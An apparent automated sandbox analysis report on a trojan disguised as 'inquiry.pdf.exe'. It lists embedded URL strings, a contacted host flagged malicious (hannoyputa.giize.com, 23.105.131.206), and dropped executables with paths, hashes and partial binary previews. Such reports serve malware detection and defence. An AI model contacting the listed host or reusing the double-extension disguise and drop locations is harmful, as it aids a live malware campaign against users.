                                              http://www.fontbureau.comI.TTF6inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271546551.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271631731.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271758905.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comalsF5inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comdvainquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comlinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Y0=inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/inquiry.pdf.exe, 00000000.00000003.261470904.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261541124.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261568725.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.carterandcone.commbeinquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.founder.com.cn/cninquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comItainquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/vinquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/s-einquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlinquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/vadinquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.carterandcone.como.(inquiry.pdf.exe, 00000000.00000003.261955611.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261989796.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.fontbureau.comminquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/k-uinquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ns.adobe.cobjImtglonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.carterandcone.comgoinquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zhongyicts.com.cno.inquiry.pdf.exe, 00000000.00000003.261927166.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comersinquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/nyginquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/syohex/java-simple-mine-sweeperC:inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn&inquiry.pdf.exe, 00000000.00000003.261291352.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comsiefinquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          23.105.131.206
                                                          		hannoyputa.giize.comUnited States
                                                          		396362LEASEWEB-USA-NYC-11UStrue
                                                          142.250.203.100
                                                          		www.google.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:715157
                                                          Start date and time:2022-10-03 17:27:43 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 24s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:inquiry.pdf.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:27
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.expl.evad.winEXE@29/9@7/3
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com
                                                          • Execution Graph export aborted for target inquiry.pdf.exe, PID 5896 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          17:29:07API Interceptor1x Sleep call for process: inquiry.pdf.exe modified
                                                          17:30:32API Interceptor14x Sleep call for process: glonkjhg.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\inquiry.pdf.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\inquiry.pdf.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                          MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jhFFFffkl.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1362
                                                          Entropy (8bit):5.343186145897752
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovj
                                                          MD5:1249251E90A1C28AB8F7235F30056DEB
                                                          SHA1:166BA6B64E9B0D9BA7B856334F7D7EC027030BA1
                                                          SHA-256:B5D65BF3581136CD5368BC47FA3972E06F526EED407BC6571D11D9CD4B5C4D83
                                                          SHA-512:FD880C5B12B22241F67139ABD09B99ACE7A4DD24635FC6B340A3E7C463E2AEF3FA68EF647352132934BC1F8CA134F46064049449ACB67954BEDDEA9AA9670885
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                          C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):78336
                                                          Entropy (8bit):4.369296705546591
                                                          Encrypted:false
                                                          SSDEEP:768:jlU4+MS3Fu0thSOV4GM0SuHk9Oh/1TRIWUk7NlfaNV9KQLxXXSv:l6o03IGMLuHk+Ck5lfaNP7xSv
                                                          MD5:0E362E7005823D0BEC3719B902ED6D62
                                                          SHA1:590D860B909804349E0CDC2F1662B37BD62F7463
                                                          SHA-256:2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                                                          SHA-512:518991B68496B3F8545E418CF9B345E0791E09CC20D177B8AA47E0ABA447AA55383C64F5BDACA39F2B061A5D08C16F2AD484AF8A9F238CA23AB081618FBA3AD3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 77%
                                                          • Antivirus: Metadefender, Detection: 14%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y ................P..&...........D... ........@.. ....................................`..................................D..W....`..............................hD............................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................D......H.......l....%......)....................................................0..6.......(8...t....&.(8...t....&......(8...t...................8;....8%.....(8...t....&.(8...t............:.....(8...t....:.....(8...t....:....(8...t....................................\:@....(8...t....&.)...&8.....(8...t....&(8...t....&.....:.......8x........:L...88....(8...t....&(8...t....&(8...t....&(8...t.....................:....8!.....(8...t....&......(8...t....&.....(8...t....:8.....(8...t....&.

                                                          C:\Users\user\AppData\Local\Temp\jhFFFffkl.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):54
                                                          Entropy (8bit):4.780272863587716
                                                          Encrypted:false
                                                          SSDEEP:3:nvm1WXp5cViEaKC5R61C1:vIWXp+NaZ5R6I1
                                                          MD5:84F251DCE20B2D2C9858E927B9D7CC07
                                                          SHA1:C2D9CC168C194D3A9DB802D2AC3A601A271B1B8C
                                                          SHA-256:177B391818C82E4ECBE90455E3B9A2971F15FAA67D0D2B98D93DDC6250139797
                                                          SHA-512:1E1AC5A3B0064FB3A16580BC830DD8E1503DD3C3C08F77999E43D5B68299182FEE5ECF57A184E600109802FBD525917199C616B3C532EB6C96676192975DBC82
                                                          Malicious:false
                                                          Preview:4760..C:\Users\user\AppData\Roaming\glonkjhg.exe..0..

                                                          C:\Users\user\AppData\Roaming\glonkjhg.exe

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):686592
                                                          Entropy (8bit):6.668579935043723
                                                          Encrypted:false
                                                          SSDEEP:12288:1DSdV3qBgQeAnkclIfVfhWQBIJ0bnaQZPyIlEnuHCW:sdV3HQeAnN+F3FbEu
                                                          MD5:6236E43DA1B2C6279760E6B2B7E2D40F
                                                          SHA1:A24221417FF9C0D169BF17B7F242824FE61D3B72
                                                          SHA-256:B4056E17199EDD889D2B77C02865136C47AB29566717C2F86AE8911C02E2994A
